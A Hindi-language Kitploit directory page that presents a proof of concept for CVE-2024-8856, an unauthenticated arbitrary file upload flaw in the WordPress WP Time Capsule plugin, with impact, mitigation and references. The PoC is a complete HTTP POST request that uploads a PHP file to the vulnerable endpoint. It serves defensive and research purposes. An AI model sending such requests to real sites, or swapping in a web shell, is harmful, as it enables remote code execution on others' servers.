Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-8856 — वर्डप्रेस WP टाइम कैप्सूल प्लगइन मनमाना फ़ाइल अपलोड कमजोरी | Kitploit
उपकरण/GitHubGitHub/ubaydev/cve-2024-8856
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHububaydev/cve-2024-8856

CVE-2024-8856

वर्डप्रेस WP टाइम कैप्सूल प्लगइन मनमाना फ़ाइल अपलोड कमजोरी

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-8856: वर्डप्रेस WP Time Capsule प्लगइन में मनमाना फ़ाइल अपलोड भेद्यता

अवलोकन

CVE-2024-8856 एक सुरक्षा भेद्यता है जो वर्डप्रेस के लिए WP Time Capsule प्लगइन में पाई गई है जो अप्रमाणित उपयोगकर्ताओं को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है। यदि अपलोड की गई फ़ाइलों को सर्वर द्वारा निष्पादित किया जाता है, तो इससे दूरस्थ कोड निष्पादन हो सकता है। यह भेद्यता अपर्याप्त फ़ाइल सत्यापन से उत्पन्न होती है और संवेदनशील एंडपॉइंट पर विशेष रूप से तैयार किए गए अनुरोध भेजकर इसका शोषण किया जा सकता है।

प्रभावित संस्करण

  • WP Time Capsule प्लगइन के संस्करण 1.22.21 से पहले (1.22.22 में पैच किया गया)।

प्रभाव

यह भेद्यता एक अप्रमाणित उपयोगकर्ताओं को अनुमति देती है:

  • सर्वर पर दुर्भावनापूर्ण PHP स्क्रिप्ट अपलोड करना।
  • सर्वर पर मनमाना कोड निष्पादित करना, जिससे पूर्ण सिस्टम से समझौता हो सकता है।
  • संभावित रूप से इस पहुंच का उपयोग करके वेब एप्लिकेशन और अंतर्निहित बुनियादी ढांचे का और अधिक शोषण करना।

प्रमाण की अवधारणा (PoC)

निम्नलिखित एक प्रमाण की अवधारणा है जो दर्शाती है कि संवेदनशील एंडपॉइंट पर POST अनुरोध भेजकर CVE-2024-8856 भेद्यता का शोषण कैसे किया जाए।

नमूना अनुरोध

root@kitploit:~
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql

<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--

PoC की व्याख्या

  • POST अनुरोध: अनुरोध उस पथ पर POST है जहां संवेदनशील अपलोड कार्यक्षमता उपलब्ध है।
  • Content-Type: अनुरोध Content-Type को multipart/form-data पर सेट करता है, जो फ़ाइल अपलोड के लिए आवश्यक है।
  • फ़ाइल अपलोड: फ़ाइल को बॉडी में Content-Disposition हेडर के साथ निर्दिष्ट किया गया है। उदाहरण में, यह <?php phpinfo(); युक्त एक PHP फ़ाइल अपलोड करने का प्रयास करता है, जो निष्पादित होने पर PHP कॉन्फ़िगरेशन विवरण प्रदर्शित करेगा।
  • संवेदनशील एंडपॉइंट: एंडपॉइंट /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php शोषण का बिंदु है।

शमन

इस भेद्यता को कम करने के लिए:

  • प्लगइन अपडेट करें: हमेशा सुनिश्चित करें कि WP Time Capsule प्लगइन डेवलपर द्वारा प्रदान किए गए नवीनतम संस्करण में अपडेट किया गया है।
  • फ़ाइल अपलोड प्रतिबंध: सर्वर पर फ़ाइल अपलोड प्रतिबंध लागू करें ताकि केवल विशिष्ट फ़ाइल प्रकार (जैसे, इमेज) की अनुमति हो और अपलोड की गई फ़ाइलों के निष्पादन को अस्वीकार करें।
  • वेब एप्लिकेशन फ़ायरवॉल (WAF): अपने सर्वर तक पहुंचने से पहले दुर्भावनापूर्ण अनुरोधों को पहचानने और ब्लॉक करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें।

संदर्भ

CVE-2024-8856 - राष्ट्रीय भेद्यता डेटाबेस

निष्कर्ष

CVE-2024-8856 एक गंभीर भेद्यता है जिस पर WP Time Capsule प्लगइन का उपयोग करने वाले WordPress साइटों के प्रशासकों का तत्काल ध्यान आवश्यक है। संभावित शोषण के खिलाफ एप्लिकेशन को सुरक्षित करने के लिए उचित सावधानी बरती जानी चाहिए। हमेशा सुरक्षा प्रथाओं और प्लगइन अपडेट के साथ अपडेट रहें।

टूल डाउनलोड करें